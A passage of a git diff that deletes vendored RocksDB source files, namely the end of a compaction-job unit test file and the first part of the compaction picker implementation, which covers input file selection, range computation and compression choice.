-  // E: Put SDel Snapshot Put SDel -> Snapshot SDel
-  // F: Put SDel Put Sdel Snapshot -> removed
-  // G: Snapshot SDel Put SDel Put -> Snapshot Put SDel
-  // H: (Put) Put SDel Put Sdel Snapshot -> Removed
-  // I: (Put) Snapshot Put SDel Put SDel -> SDel
-  // J: Put Put SDel Put SDel SDel Snapshot Put Put SDel SDel Put
-  //      -> Snapshot Put
-  // K: SDel SDel Put SDel Put Put Snapshot SDel Put SDel SDel Put SDel
-  //      -> Snapshot Put Snapshot SDel
-  // L: SDel Put Del Put SDel Snapshot Del Put Del SDel Put SDel
-  //      -> Snapshot SDel
-  // M: (Put) SDel Put Del Put SDel Snapshot Put Del SDel Put SDel Del
-  //      -> SDel Snapshot Del
-  NewDB();
-
-  auto file1 = mock::MakeMockFile({
-      {KeyStr("A", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("A", 13U, kTypeValue), "val5"},
-      {KeyStr("A", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("B", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("B", 13U, kTypeValue), "val2"},
-      {KeyStr("C", 14U, kTypeValue), "val3"},
-      {KeyStr("D", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("D", 11U, kTypeValue), "val4"},
-      {KeyStr("G", 15U, kTypeValue), "val"},
-      {KeyStr("G", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("G", 13U, kTypeValue), "val"},
-      {KeyStr("I", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("I", 13U, kTypeValue), "val"},
-      {KeyStr("J", 15U, kTypeValue), "val"},
-      {KeyStr("J", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 13U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 12U, kTypeValue), "val"},
-      {KeyStr("J", 11U, kTypeValue), "val"},
-      {KeyStr("K", 16U, kTypeSingleDeletion), ""},
-      {KeyStr("K", 15U, kTypeValue), "val1"},
-      {KeyStr("K", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("K", 13U, kTypeSingleDeletion), ""},
-      {KeyStr("K", 12U, kTypeValue), "val2"},
-      {KeyStr("K", 11U, kTypeSingleDeletion), ""},
-      {KeyStr("L", 16U, kTypeSingleDeletion), ""},
-      {KeyStr("L", 15U, kTypeValue), "val"},
-      {KeyStr("L", 14U, kTypeSingleDeletion), ""},
-      {KeyStr("L", 13U, kTypeDeletion), ""},
-      {KeyStr("L", 12U, kTypeValue), "val"},
-      {KeyStr("L", 11U, kTypeDeletion), ""},
-      {KeyStr("M", 16U, kTypeDeletion), ""},
-      {KeyStr("M", 15U, kTypeSingleDeletion), ""},
-      {KeyStr("M", 14U, kTypeValue), "val"},
-      {KeyStr("M", 13U, kTypeSingleDeletion), ""},
-      {KeyStr("M", 12U, kTypeDeletion), ""},
-      {KeyStr("M", 11U, kTypeValue), "val"},
-  });
-  AddMockFile(file1);
-
-  auto file2 = mock::MakeMockFile({
-      {KeyStr("A", 10U, kTypeValue), "val"},
-      {KeyStr("B", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("B", 11U, kTypeValue), "val2"},
-      {KeyStr("C", 10U, kTypeSingleDeletion), ""},
-      {KeyStr("C", 9U, kTypeValue), "val6"},
-      {KeyStr("C", 8U, kTypeSingleDeletion), ""},
-      {KeyStr("D", 10U, kTypeSingleDeletion), ""},
-      {KeyStr("E", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("E", 11U, kTypeValue), "val"},
-      {KeyStr("E", 5U, kTypeSingleDeletion), ""},
-      {KeyStr("E", 4U, kTypeValue), "val"},
-      {KeyStr("F", 6U, kTypeSingleDeletion), ""},
-      {KeyStr("F", 5U, kTypeValue), "val"},
-      {KeyStr("F", 4U, kTypeSingleDeletion), ""},
-      {KeyStr("F", 3U, kTypeValue), "val"},
-      {KeyStr("G", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("H", 6U, kTypeSingleDeletion), ""},
-      {KeyStr("H", 5U, kTypeValue), "val"},
-      {KeyStr("H", 4U, kTypeSingleDeletion), ""},
-      {KeyStr("H", 3U, kTypeValue), "val"},
-      {KeyStr("I", 12U, kTypeSingleDeletion), ""},
-      {KeyStr("I", 11U, kTypeValue), "val"},
-      {KeyStr("J", 6U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 5U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 4U, kTypeValue), "val"},
-      {KeyStr("J", 3U, kTypeSingleDeletion), ""},
-      {KeyStr("J", 2U, kTypeValue), "val"},
-      {KeyStr("K", 8U, kTypeValue), "val3"},
-      {KeyStr("K", 7U, kTypeValue), "val4"},
-      {KeyStr("K", 6U, kTypeSingleDeletion), ""},
-      {KeyStr("K", 5U, kTypeValue), "val5"},
-      {KeyStr("K", 2U, kTypeSingleDeletion), ""},
-      {KeyStr("K", 1U, kTypeSingleDeletion), ""},
-      {KeyStr("L", 5U, kTypeSingleDeletion), ""},
-      {KeyStr("L", 4U, kTypeValue), "val"},
-      {KeyStr("L", 3U, kTypeDeletion), ""},
-      {KeyStr("L", 2U, kTypeValue), "val"},
-      {KeyStr("L", 1U, kTypeSingleDeletion), ""},
-      {KeyStr("M", 10U, kTypeSingleDeletion), ""},
-      {KeyStr("M", 7U, kTypeValue), "val"},
-      {KeyStr("M", 5U, kTypeDeletion), ""},
-      {KeyStr("M", 4U, kTypeValue), "val"},
-      {KeyStr("M", 3U, kTypeSingleDeletion), ""},
-  });
-  AddMockFile(file2);
-
-  auto file3 = mock::MakeMockFile({
-      {KeyStr("D", 1U, kTypeValue), "val"},
-      {KeyStr("H", 1U, kTypeValue), "val"},
-      {KeyStr("I", 2U, kTypeValue), "val"},
-  });
-  AddMockFile(file3, 2);
-
-  auto file4 = mock::MakeMockFile({
-      {KeyStr("M", 1U, kTypeValue), "val"},
-  });
-  AddMockFile(file4, 2);
-
-  auto expected_results =
-      mock::MakeMockFile({{KeyStr("A", 14U, kTypeSingleDeletion), ""},
-                          {KeyStr("A", 13U, kTypeValue), ""},
-                          {KeyStr("A", 12U, kTypeSingleDeletion), ""},
-                          {KeyStr("A", 10U, kTypeValue), "val"},
-                          {KeyStr("B", 14U, kTypeSingleDeletion), ""},
-                          {KeyStr("B", 13U, kTypeValue), ""},
-                          {KeyStr("C", 14U, kTypeValue), "val3"},
-                          {KeyStr("D", 12U, kTypeSingleDeletion), ""},
-                          {KeyStr("D", 11U, kTypeValue), ""},
-                          {KeyStr("D", 10U, kTypeSingleDeletion), ""},
-                          {KeyStr("E", 12U, kTypeSingleDeletion), ""},
-                          {KeyStr("E", 11U, kTypeValue), ""},
-                          {KeyStr("G", 15U, kTypeValue), "val"},
-                          {KeyStr("G", 12U, kTypeSingleDeletion), ""},
-                          {KeyStr("I", 14U, kTypeSingleDeletion), ""},
-                          {KeyStr("I", 13U, kTypeValue), ""},
-                          {KeyStr("J", 15U, kTypeValue), "val"},
-                          {KeyStr("K", 16U, kTypeSingleDeletion), ""},
-                          {KeyStr("K", 15U, kTypeValue), ""},
-                          {KeyStr("K", 11U, kTypeSingleDeletion), ""},
-                          {KeyStr("K", 8U, kTypeValue), "val3"},
-                          {KeyStr("L", 16U, kTypeSingleDeletion), ""},
-                          {KeyStr("L", 15U, kTypeValue), ""},
-                          {KeyStr("M", 16U, kTypeDeletion), ""},
-                          {KeyStr("M", 3U, kTypeSingleDeletion), ""}});
-
-  SetLastSequence(22U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results, {10U}, 10U);
-}
-
-// This test documents the behavior where a corrupt key follows a deletion or a
-// single deletion and the (single) deletion gets removed while the corrupt key
-// gets written out. TODO(noetzli): We probably want a better way to treat
-// corrupt keys.
-TEST_F(CompactionJobTest, CorruptionAfterDeletion) {
-  NewDB();
-
-  auto file1 =
-      mock::MakeMockFile({{test::KeyStr("A", 6U, kTypeValue), "val3"},
-                          {test::KeyStr("a", 5U, kTypeDeletion), ""},
-                          {test::KeyStr("a", 4U, kTypeValue, true), "val"}});
-  AddMockFile(file1);
-
-  auto file2 =
-      mock::MakeMockFile({{test::KeyStr("b", 3U, kTypeSingleDeletion), ""},
-                          {test::KeyStr("b", 2U, kTypeValue, true), "val"},
-                          {test::KeyStr("c", 1U, kTypeValue), "val2"}});
-  AddMockFile(file2);
-
-  auto expected_results =
-      mock::MakeMockFile({{test::KeyStr("A", 0U, kTypeValue), "val3"},
-                          {test::KeyStr("a", 0U, kTypeValue, true), "val"},
-                          {test::KeyStr("b", 0U, kTypeValue, true), "val"},
-                          {test::KeyStr("c", 1U, kTypeValue), "val2"}});
-
-  SetLastSequence(6U);
-  auto files = cfd_->current()->storage_info()->LevelFiles(0);
-  RunCompaction({files}, expected_results);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as CompactionJobStats is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/compaction_picker.cc b/thirdparty/rocksdb/db/compaction_picker.cc
deleted file mode 100644
index 79af3ed..0000000
--- a/thirdparty/rocksdb/db/compaction_picker.cc
+++ /dev/null
@@ -1,1594 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/compaction_picker.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <limits>
-#include <queue>
-#include <string>
-#include <utility>
-#include "db/column_family.h"
-#include "monitoring/statistics.h"
-#include "util/filename.h"
-#include "util/log_buffer.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-namespace {
-uint64_t TotalCompensatedFileSize(const std::vector<FileMetaData*>& files) {
-  uint64_t sum = 0;
-  for (size_t i = 0; i < files.size() && files[i]; i++) {
-    sum += files[i]->compensated_file_size;
-  }
-  return sum;
-}
-
-bool FindIntraL0Compaction(const std::vector<FileMetaData*>& level_files,
-                           size_t min_files_to_compact,
-                           uint64_t max_compact_bytes_per_del_file,
-                           CompactionInputFiles* comp_inputs) {
-  size_t compact_bytes = level_files[0]->fd.file_size;
-  size_t compact_bytes_per_del_file = port::kMaxSizet;
-  // compaction range will be [0, span_len).
-  size_t span_len;
-  // pull in files until the amount of compaction work per deleted file begins
-  // increasing.
-  size_t new_compact_bytes_per_del_file = 0;
-  for (span_len = 1; span_len < level_files.size(); ++span_len) {
-    compact_bytes += level_files[span_len]->fd.file_size;
-    new_compact_bytes_per_del_file = compact_bytes / span_len;
-    if (level_files[span_len]->being_compacted ||
-        new_compact_bytes_per_del_file > compact_bytes_per_del_file) {
-      break;
-    }
-    compact_bytes_per_del_file = new_compact_bytes_per_del_file;
-  }
-
-  if (span_len >= min_files_to_compact &&
-      new_compact_bytes_per_del_file < max_compact_bytes_per_del_file) {
-    assert(comp_inputs != nullptr);
-    comp_inputs->level = 0;
-    for (size_t i = 0; i < span_len; ++i) {
-      comp_inputs->files.push_back(level_files[i]);
-    }
-    return true;
-  }
-  return false;
-}
-}  // anonymous namespace
-
-// Determine compression type, based on user options, level of the output
-// file and whether compression is disabled.
-// If enable_compression is false, then compression is always disabled no
-// matter what the values of the other two parameters are.
-// Otherwise, the compression type is determined based on options and level.
-CompressionType GetCompressionType(const ImmutableCFOptions& ioptions,
-                                   const VersionStorageInfo* vstorage,
-                                   const MutableCFOptions& mutable_cf_options,
-                                   int level, int base_level,
-                                   const bool enable_compression) {
-  if (!enable_compression) {
-    // disable compression
-    return kNoCompression;
-  }
-
-  // If bottommost_compression is set and we are compacting to the
-  // bottommost level then we should use it.
-  if (ioptions.bottommost_compression != kDisableCompressionOption &&
-      level > base_level && level >= (vstorage->num_non_empty_levels() - 1)) {
-    return ioptions.bottommost_compression;
-  }
-  // If the user has specified a different compression level for each level,
-  // then pick the compression for that level.
-  if (!ioptions.compression_per_level.empty()) {
-    assert(level == 0 || level >= base_level);
-    int idx = (level == 0) ? 0 : level - base_level + 1;
-
-    const int n = static_cast<int>(ioptions.compression_per_level.size()) - 1;
-    // It is possible for level_ to be -1; in that case, we use level
-    // 0's compression.  This occurs mostly in backwards compatibility
-    // situations when the builder doesn't know what level the file
-    // belongs to.  Likewise, if level is beyond the end of the
-    // specified compression levels, use the last value.
-    return ioptions.compression_per_level[std::max(0, std::min(idx, n))];
-  } else {
-    return mutable_cf_options.compression;
-  }
-}
-
-CompactionPicker::CompactionPicker(const ImmutableCFOptions& ioptions,
-                                   const InternalKeyComparator* icmp)
-    : ioptions_(ioptions), icmp_(icmp) {}
-
-CompactionPicker::~CompactionPicker() {}
-
-// Delete this compaction from the list of running compactions.
-void CompactionPicker::ReleaseCompactionFiles(Compaction* c, Status status) {
-  UnregisterCompaction(c);
-  if (!status.ok()) {
-    c->ResetNextCompactionIndex();
-  }
-}
-
-void CompactionPicker::GetRange(const CompactionInputFiles& inputs,
-                                InternalKey* smallest,
-                                InternalKey* largest) const {
-  const int level = inputs.level;
-  assert(!inputs.empty());
-  smallest->Clear();
-  largest->Clear();
-
-  if (level == 0) {
-    for (size_t i = 0; i < inputs.size(); i++) {
-      FileMetaData* f = inputs[i];
-      if (i == 0) {
-        *smallest = f->smallest;
-        *largest = f->largest;
-      } else {
-        if (icmp_->Compare(f->smallest, *smallest) < 0) {
-          *smallest = f->smallest;
-        }
-        if (icmp_->Compare(f->largest, *largest) > 0) {
-          *largest = f->largest;
-        }
-      }
-    }
-  } else {
-    *smallest = inputs[0]->smallest;
-    *largest = inputs[inputs.size() - 1]->largest;
-  }
-}
-
-void CompactionPicker::GetRange(const CompactionInputFiles& inputs1,
-                                const CompactionInputFiles& inputs2,
-                                InternalKey* smallest,
-                                InternalKey* largest) const {
-  assert(!inputs1.empty() || !inputs2.empty());
-  if (inputs1.empty()) {
-    GetRange(inputs2, smallest, largest);
-  } else if (inputs2.empty()) {
-    GetRange(inputs1, smallest, largest);
-  } else {
-    InternalKey smallest1, smallest2, largest1, largest2;
-    GetRange(inputs1, &smallest1, &largest1);
-    GetRange(inputs2, &smallest2, &largest2);
-    *smallest =
-        icmp_->Compare(smallest1, smallest2) < 0 ? smallest1 : smallest2;
-    *largest = icmp_->Compare(largest1, largest2) < 0 ? largest2 : largest1;
-  }
-}
-
-void CompactionPicker::GetRange(const std::vector<CompactionInputFiles>& inputs,
-                                InternalKey* smallest,
-                                InternalKey* largest) const {
-  InternalKey current_smallest;
-  InternalKey current_largest;
-  bool initialized = false;
-  for (const auto& in : inputs) {
-    if (in.empty()) {
-      continue;
-    }
-    GetRange(in, &current_smallest, &current_largest);
-    if (!initialized) {
-      *smallest = current_smallest;
-      *largest = current_largest;
-      initialized = true;
-    } else {
-      if (icmp_->Compare(current_smallest, *smallest) < 0) {
-        *smallest = current_smallest;
-      }
-      if (icmp_->Compare(current_largest, *largest) > 0) {
-        *largest = current_largest;
-      }
-    }
-  }
-  assert(initialized);
-}
-
-bool CompactionPicker::ExpandInputsToCleanCut(const std::string& cf_name,
-                                              VersionStorageInfo* vstorage,
-                                              CompactionInputFiles* inputs) {
-  // This isn't good compaction
-  assert(!inputs->empty());
-
-  const int level = inputs->level;
-  // GetOverlappingInputs will always do the right thing for level-0.
-  // So we don't need to do any expansion if level == 0.
-  if (level == 0) {
-    return true;
-  }
-
-  InternalKey smallest, largest;
-
-  // Keep expanding inputs until we are sure that there is a "clean cut"
-  // boundary between the files in input and the surrounding files.
-  // This will ensure that no parts of a key are lost during compaction.
-  int hint_index = -1;
-  size_t old_size;
-  do {
-    old_size = inputs->size();
-    GetRange(*inputs, &smallest, &largest);
-    inputs->clear();
-    vstorage->GetOverlappingInputs(level, &smallest, &largest, &inputs->files,
-                                   hint_index, &hint_index);
-  } while (inputs->size() > old_size);
-
-  // we started off with inputs non-empty and the previous loop only grew
-  // inputs. thus, inputs should be non-empty here
-  assert(!inputs->empty());
-
-  // If, after the expansion, there are files that are already under
-  // compaction, then we must drop/cancel this compaction.
-  if (AreFilesInCompaction(inputs->files)) {
-    return false;
-  }
-  return true;
-}
-
-bool CompactionPicker::RangeOverlapWithCompaction(
-    const Slice& smallest_user_key, const Slice& largest_user_key,
-    int level) const {
-  const Comparator* ucmp = icmp_->user_comparator();
-  for (Compaction* c : compactions_in_progress_) {
-    if (c->output_level() == level &&
-        ucmp->Compare(smallest_user_key, c->GetLargestUserKey()) <= 0 &&
-        ucmp->Compare(largest_user_key, c->GetSmallestUserKey()) >= 0) {
-      // Overlap
-      return true;
-    }
-  }
-  // Did not overlap with any running compaction in level `level`
-  return false;
-}
-
-bool CompactionPicker::FilesRangeOverlapWithCompaction(
-    const std::vector<CompactionInputFiles>& inputs, int level) const {
-  bool is_empty = true;
-  for (auto& in : inputs) {
-    if (!in.empty()) {
-      is_empty = false;
-      break;
-    }
-  }
-  if (is_empty) {
-    // No files in inputs
-    return false;
-  }
-
-  InternalKey smallest, largest;
-  GetRange(inputs, &smallest, &largest);
-  return RangeOverlapWithCompaction(smallest.user_key(), largest.user_key(),
-                                    level);
-}
-
-// Returns true if any one of specified files are being compacted
-bool CompactionPicker::AreFilesInCompaction(
-    const std::vector<FileMetaData*>& files) {
-  for (size_t i = 0; i < files.size(); i++) {
-    if (files[i]->being_compacted) {
-      return true;
-    }
-  }
-  return false;
-}
-
-Compaction* CompactionPicker::CompactFiles(
-    const CompactionOptions& compact_options,
-    const std::vector<CompactionInputFiles>& input_files, int output_level,
-    VersionStorageInfo* vstorage, const MutableCFOptions& mutable_cf_options,
-    uint32_t output_path_id) {
-  assert(input_files.size());
-
-  // TODO(rven ): we might be able to run concurrent level 0 compaction
-  // if the key ranges of the two compactions do not overlap, but for now
-  // we do not allow it.
-  if ((input_files[0].level == 0) && !level0_compactions_in_progress_.empty()) {
-    return nullptr;
-  }
-  // This compaction output could overlap with a running compaction
-  if (FilesRangeOverlapWithCompaction(input_files, output_level)) {
-    return nullptr;
-  }
-  auto c =
-      new Compaction(vstorage, ioptions_, mutable_cf_options, input_files,
-                     output_level, compact_options.output_file_size_limit,
-                     mutable_cf_options.max_compaction_bytes, output_path_id,
-                     compact_options.compression, /* grandparents */ {}, true);
-
-  // If it's level 0 compaction, make sure we don't execute any other level 0
-  // compactions in parallel
-  RegisterCompaction(c);
-  return c;
-}
-
-Status CompactionPicker::GetCompactionInputsFromFileNumbers(
-    std::vector<CompactionInputFiles>* input_files,
-    std::unordered_set<uint64_t>* input_set, const VersionStorageInfo* vstorage,
-    const CompactionOptions& compact_options) const {
-  if (input_set->size() == 0U) {
-    return Status::InvalidArgument(
-        "Compaction must include at least one file.");
-  }
-  assert(input_files);
-
-  std::vector<CompactionInputFiles> matched_input_files;
-  matched_input_files.resize(vstorage->num_levels());
-  int first_non_empty_level = -1;
-  int last_non_empty_level = -1;
-  // TODO(yhchiang): use a lazy-initialized mapping from
-  //                 file_number to FileMetaData in Version.
-  for (int level = 0; level < vstorage->num_levels(); ++level) {
-    for (auto file : vstorage->LevelFiles(level)) {
-      auto iter = input_set->find(file->fd.GetNumber());
-      if (iter != input_set->end()) {
-        matched_input_files[level].files.push_back(file);
-        input_set->erase(iter);
-        last_non_empty_level = level;
-        if (first_non_empty_level == -1) {
-          first_non_empty_level = level;
-        }
-      }
-    }
-  }
-
-  if (!input_set->empty()) {
-    std::string message(
-        "Cannot find matched SST files for the following file numbers:");
-    for (auto fn : *input_set) {
-      message += " ";
-      message += ToString(fn);
-    }
-    return Status::InvalidArgument(message);
-  }
-
-  for (int level = first_non_empty_level; level <= last_non_empty_level;
-       ++level) {
-    matched_input_files[level].level = level;
-    input_files->emplace_back(std::move(matched_input_files[level]));
-  }
-
-  return Status::OK();
-}
-
-// Returns true if any one of the parent files are being compacted
-bool CompactionPicker::IsRangeInCompaction(VersionStorageInfo* vstorage,
-                                           const InternalKey* smallest,
-                                           const InternalKey* largest,
-                                           int level, int* level_index) {
-  std::vector<FileMetaData*> inputs;
-  assert(level < NumberLevels());
-
-  vstorage->GetOverlappingInputs(level, smallest, largest, &inputs,
-                                 *level_index, level_index);
-  return AreFilesInCompaction(inputs);
-}
-
-// Populates the set of inputs of all other levels that overlap with the
-// start level.
-// Now we assume all levels except start level and output level are empty.
-// Will also attempt to expand "start level" if that doesn't expand
-// "output level" or cause "level" to include a file for compaction that has an
-// overlapping user-key with another file.
-// REQUIRES: input_level and output_level are different
-// REQUIRES: inputs->empty() == false
-// Returns false if files on parent level are currently in compaction, which
-// means that we can't compact them
-bool CompactionPicker::SetupOtherInputs(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, CompactionInputFiles* inputs,
-    CompactionInputFiles* output_level_inputs, int* parent_index,
-    int base_index) {
-  assert(!inputs->empty());
-  assert(output_level_inputs->empty());
-  const int input_level = inputs->level;
-  const int output_level = output_level_inputs->level;
-  assert(input_level != output_level);
-
-  // For now, we only support merging two levels, start level and output level.
-  // We need to assert other levels are empty.
-  for (int l = input_level + 1; l < output_level; l++) {
-    assert(vstorage->NumLevelFiles(l) == 0);
-  }
-
-  InternalKey smallest, largest;
-
-  // Get the range one last time.
-  GetRange(*inputs, &smallest, &largest);
-
-  // Populate the set of next-level files (inputs_GetOutputLevelInputs()) to
-  // include in compaction
-  vstorage->GetOverlappingInputs(output_level, &smallest, &largest,
-                                 &output_level_inputs->files, *parent_index,
-                                 parent_index);
-  if (AreFilesInCompaction(output_level_inputs->files)) {
-    return false;
-  }
-  if (!output_level_inputs->empty()) {
-    if (!ExpandInputsToCleanCut(cf_name, vstorage, output_level_inputs)) {
-      return false;
-    }
-  }
-
-  // See if we can further grow the number of inputs in "level" without
-  // changing the number of "level+1" files we pick up. We also choose NOT
-  // to expand if this would cause "level" to include some entries for some
-  // user key, while excluding other entries for the same user key. This
-  // can happen when one user key spans multiple files.
-  if (!output_level_inputs->empty()) {
-    const uint64_t limit = mutable_cf_options.max_compaction_bytes;
-    const uint64_t output_level_inputs_size =
-        TotalCompensatedFileSize(output_level_inputs->files);
-    const uint64_t inputs_size = TotalCompensatedFileSize(inputs->files);
-    bool expand_inputs = false;
-
-    CompactionInputFiles expanded_inputs;
-    expanded_inputs.level = input_level;
-    // Get closed interval of output level
-    InternalKey all_start, all_limit;
-    GetRange(*inputs, *output_level_inputs, &all_start, &all_limit);
-    bool try_overlapping_inputs = true;
-    vstorage->GetOverlappingInputs(input_level, &all_start, &all_limit,
-                                   &expanded_inputs.files, base_index, nullptr);
-    uint64_t expanded_inputs_size =
-        TotalCompensatedFileSize(expanded_inputs.files);
-    if (!ExpandInputsToCleanCut(cf_name, vstorage, &expanded_inputs)) {
-      try_overlapping_inputs = false;
-    }
-    if (try_overlapping_inputs && expanded_inputs.size() > inputs->size() &&
-        output_level_inputs_size + expanded_inputs_size < limit &&
-        !AreFilesInCompaction(expanded_inputs.files)) {
-      InternalKey new_start, new_limit;
-      GetRange(expanded_inputs, &new_start, &new_limit);
-      CompactionInputFiles expanded_output_level_inputs;
-      expanded_output_level_inputs.level = output_level;
-      vstorage->GetOverlappingInputs(output_level, &new_start, &new_limit,
-                                     &expanded_output_level_inputs.files,
-                                     *parent_index, parent_index);
-      assert(!expanded_output_level_inputs.empty());
-      if (!AreFilesInCompaction(expanded_output_level_inputs.files) &&
-          ExpandInputsToCleanCut(cf_name, vstorage,
-                                 &expanded_output_level_inputs) &&
-          expanded_output_level_inputs.size() == output_level_inputs->size()) {
-        expand_inputs = true;
-      }
-    }
-    if (!expand_inputs) {
-      vstorage->GetCleanInputsWithinInterval(input_level, &all_start,
-                                             &all_limit, &expanded_inputs.files,
-                                             base_index, nullptr);
-      expanded_inputs_size = TotalCompensatedFileSize(expanded_inputs.files);
-      if (expanded_inputs.size() > inputs->size() &&
-          output_level_inputs_size + expanded_inputs_size < limit &&
-          !AreFilesInCompaction(expanded_inputs.files)) {
-        expand_inputs = true;
-      }
-    }
-    if (expand_inputs) {
-      ROCKS_LOG_INFO(ioptions_.info_log,
-                     "[%s] Expanding@%d %" ROCKSDB_PRIszt "+%" ROCKSDB_PRIszt
-                     "(%" PRIu64 "+%" PRIu64 " bytes) to %" ROCKSDB_PRIszt
-                     "+%" ROCKSDB_PRIszt " (%" PRIu64 "+%" PRIu64 "bytes)\n",
-                     cf_name.c_str(), input_level, inputs->size(),
-                     output_level_inputs->size(), inputs_size,
-                     output_level_inputs_size, expanded_inputs.size(),
-                     output_level_inputs->size(), expanded_inputs_size,
-                     output_level_inputs_size);
-      inputs->files = expanded_inputs.files;
-    }
-  }
-  return true;
-}
-
-void CompactionPicker::GetGrandparents(
-    VersionStorageInfo* vstorage, const CompactionInputFiles& inputs,
-    const CompactionInputFiles& output_level_inputs,
-    std::vector<FileMetaData*>* grandparents) {
-  InternalKey start, limit;
-  GetRange(inputs, output_level_inputs, &start, &limit);
-  // Compute the set of grandparent files that overlap this compaction
-  // (parent == level+1; grandparent == level+2)
-  if (output_level_inputs.level + 1 < NumberLevels()) {
-    vstorage->GetOverlappingInputs(output_level_inputs.level + 1, &start,
-                                   &limit, grandparents);
-  }
-}
-
-Compaction* CompactionPicker::CompactRange(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, int input_level, int output_level,
-    uint32_t output_path_id, const InternalKey* begin, const InternalKey* end,
-    InternalKey** compaction_end, bool* manual_conflict) {
-  // CompactionPickerFIFO has its own implementation of compact range
-  assert(ioptions_.compaction_style != kCompactionStyleFIFO);
-
-  if (input_level == ColumnFamilyData::kCompactAllLevels) {
-    assert(ioptions_.compaction_style == kCompactionStyleUniversal);
-
-    // Universal compaction with more than one level always compacts all the
-    // files together to the last level.
-    assert(vstorage->num_levels() > 1);
-    // DBImpl::CompactRange() set output level to be the last level
-    if (ioptions_.allow_ingest_behind) {
-      assert(output_level == vstorage->num_levels() - 2);
-    } else {
-      assert(output_level == vstorage->num_levels() - 1);
-    }
-    // DBImpl::RunManualCompaction will make full range for universal compaction
-    assert(begin == nullptr);
-    assert(end == nullptr);
-    *compaction_end = nullptr;
-
-    int start_level = 0;
-    for (; start_level < vstorage->num_levels() &&
-           vstorage->NumLevelFiles(start_level) == 0;
-         start_level++) {
-    }
-    if (start_level == vstorage->num_levels()) {
-      return nullptr;
-    }
-
-    if ((start_level == 0) && (!level0_compactions_in_progress_.empty())) {
-      *manual_conflict = true;
-      // Only one level 0 compaction allowed
-      return nullptr;
-    }
-
-    std::vector<CompactionInputFiles> inputs(vstorage->num_levels() -
-                                             start_level);
-    for (int level = start_level; level < vstorage->num_levels(); level++) {
-      inputs[level - start_level].level = level;
-      auto& files = inputs[level - start_level].files;
-      for (FileMetaData* f : vstorage->LevelFiles(level)) {
-        files.push_back(f);
-      }
-      if (AreFilesInCompaction(files)) {
-        *manual_conflict = true;
-        return nullptr;
-      }
-    }
-
-    // 2 non-exclusive manual compactions could run at the same time producing
-    // overlaping outputs in the same level.
-    if (FilesRangeOverlapWithCompaction(inputs, output_level)) {
-      // This compaction output could potentially conflict with the output
-      // of a currently running compaction, we cannot run it.
-      *manual_conflict = true;
-      return nullptr;
-    }
-
-    Compaction* c = new Compaction(
-        vstorage, ioptions_, mutable_cf_options, std::move(inputs),
-        output_level, mutable_cf_options.MaxFileSizeForLevel(output_level),
-        /* max_compaction_bytes */ LLONG_MAX, output_path_id,
-        GetCompressionType(ioptions_, vstorage, mutable_cf_options,
-                           output_level, 1),
-        /* grandparents */ {}, /* is manual */ true);
-    RegisterCompaction(c);
-    return c;
-  }
-
-  CompactionInputFiles inputs;
-  inputs.level = input_level;
-  bool covering_the_whole_range = true;
-
-  // All files are 'overlapping' in universal style compaction.
-  // We have to compact the entire range in one shot.
-  if (ioptions_.compaction_style == kCompactionStyleUniversal) {
-    begin = nullptr;
-    end = nullptr;
-  }
-
-  vstorage->GetOverlappingInputs(input_level, begin, end, &inputs.files);
-  if (inputs.empty()) {
-    return nullptr;
-  }
-
-  if ((input_level == 0) && (!level0_compactions_in_progress_.empty())) {
-    // Only one level 0 compaction allowed
-    TEST_SYNC_POINT("CompactionPicker::CompactRange:Conflict");
-    *manual_conflict = true;
-    return nullptr;
-  }
-
-  // Avoid compacting too much in one shot in case the range is large.
-  // But we cannot do this for level-0 since level-0 files can overlap
-  // and we must not pick one file and drop another older file if the
-  // two files overlap.
-  if (input_level > 0) {
-    const uint64_t limit = mutable_cf_options.max_compaction_bytes;
-    uint64_t total = 0;
-    for (size_t i = 0; i + 1 < inputs.size(); ++i) {
-      uint64_t s = inputs[i]->compensated_file_size;
-      total += s;
-      if (total >= limit) {
-        **compaction_end = inputs[i + 1]->smallest;
-        covering_the_whole_range = false;
-        inputs.files.resize(i + 1);
-        break;
-      }
-    }
-  }
-  assert(output_path_id < static_cast<uint32_t>(ioptions_.db_paths.size()));
-
-  if (ExpandInputsToCleanCut(cf_name, vstorage, &inputs) == false) {
-    // manual compaction is now multi-threaded, so it can
-    // happen that ExpandWhileOverlapping fails
-    // we handle it higher in RunManualCompaction
-    *manual_conflict = true;
-    return nullptr;
-  }
-
-  if (covering_the_whole_range) {
-    *compaction_end = nullptr;
-  }
-
-  CompactionInputFiles output_level_inputs;
-  if (output_level == ColumnFamilyData::kCompactToBaseLevel) {
-    assert(input_level == 0);
